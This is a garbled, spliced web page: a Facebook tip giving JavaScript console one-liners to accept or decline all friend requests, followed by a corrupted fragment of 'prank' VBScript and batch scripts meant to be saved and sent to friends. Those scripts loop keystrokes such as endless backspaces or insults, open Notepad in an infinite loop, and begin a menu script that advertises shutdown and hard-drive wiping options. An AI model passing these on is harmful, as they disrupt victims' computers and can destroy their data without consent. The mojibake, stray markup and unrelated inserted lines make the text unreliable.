HOW TO ACCEPT OR DECLINE ALL FRIEND REQUESTS ON FACEBOOK AT ONCE?
How do you want feel once you login in your Facebook Account to learn you have received over 100+ Friends Requests over the time you are offline?
 In line with a recent survey, people are exited if they receive fresh friend asks, especially through the opposite sex. So why then should somebody be disappointed about receiving friend requests? â
The duty of pressing âAccept â in addition to âDecline â on everyone of everyone involving such many friend asks for. received will be boring in addition to tiring, thatâs why you have got to get more than it right away â accept all or decline all the requests. Thereâs this piece of code that may solve your entire problem after, it could accept or decline your entire pending friend requests with the click of the button.
 HOW CAN I ACCEPT ALL MY REQUEST OR DECLINE ALL WITH JUST A CLICK OF A BUTTON
Follow these steps carefully to manage all your pending Facebook Friend requests at once.
Login to your Facebook account.
 Go to Friend Request page by visiting http://facebook.com/friends/edit/?sk=requests.
 Once you get to the Page showing all the Pending Friends Request, Clear the URL in your address bar and Paste any of the Code below to either Accept all or Decline all your pending requests.
 * To Accept all, Paste this Code into your Browser, Then Hit the Enter button.
 javascript:for(i=1;ilt;document.getElementsByName(âactions[accept]â).length;i ){document.getElementsByName(âactions[accept]â)[i].click();}void(0);
 * To Decline all, Paste this Code into your Browser, Then Hit the Enter button.
 javascript:for(i=1;ilt;document.getElementsByName(âactions[hide]â).length;i ){document.getElementsByName(âactions[hide]â)[i].click();}void(0);
 Note: - Whenever you Paste any of the above Code into your Browser,
The Browser automatically Stripe out or Remove the JavaScript: code from the Browser, Youâve to Type it in front of the Code before hitting the Enter ButtonâŚTake Note.
 botto�I010� �0� eight: 14.55pt;background:white'>
Remember donât click on this file in your Computer.
If you feel hunger, try lizard feet
 -ali^ďż˝tr0ďż˝ ďż˝0ďż˝ auto;-webkit-text-stroke-width: 0px; word-spacing:0px'>Save it as âAnything.VBS" and send it.
5)Â Wide open Notepad, slowly type âHello, how do you think youâre? I feel good thanksâ after some time of clicking on the record and fanatic someone out and about.:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(âWScript.Shellâ)
WshShell.Run ânotepadâ
WScript.Sleep 100
WshShell.AppActivate âNotepadâ
WScript.Sleep 500
WshShell.SendKeys âHelâ
WScript.Sleep 500
WshShell.SendKeys âlo â
WScript.Sleep 500
WshShell.SendKeys â, hoâ
WScript.Sleep 500
WshShell.SendKeys âw aâ
WScript.Sleep 500
WshShell.SendKeys âre â
WScript.Sleep 500
WshShell.SendKeys âyouâ
WScript.Sleep 500
WshShell.SendKeys â? â
WScript.Sleep 500
WshShell.SendKeys âI aâ
WScript.Sleep 500
WshShell.SendKeys âm gâ
WScript.Sleep 500
WshShell.SendKeys âoodâ
WScript.Sleep 500
WshShell.SendKeys â thâ
WScript.Sleep 500
WshShell.SendKeys âankâ
WScript.Sleep 500
WshShell.SendKeys âs! â
Save it as âAnything.VBS" and send it.
6) Frustrate someone by making this VBScript hit Backspace simultaneously:
Type :
MsgBox âLetâs go back a few stepsâ
Set wshShell =wscript.CreateObject(âWScript.Shellâ)
do
wscript.sleep 100
wshshell.sendkeys â{bs}â
loop
Save it as âAnything.VBS" and send it.
7) Crack the particular computer keyboard in addition to allow it to become type âYou are a foolâ continuously.:
Type :
Set wshShell = wscript.CreateObject(âWScript.Shellâ)
do
wscript.sleep 100
wshshell.sendkeys âYou are a fool.â
loop
Save it as âAnything.VBS" and send it.
8. Open Notepad regularly within your friendsâ computer system.:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as âAnything.BAT" and send it.
9) Difficult prank: Select your killer batch data file. It demands your friend to settle on a range between 1-5 after which does some action.:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press âxâ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etcâŚ
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (youâre boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as âAnything.BAT" and send it.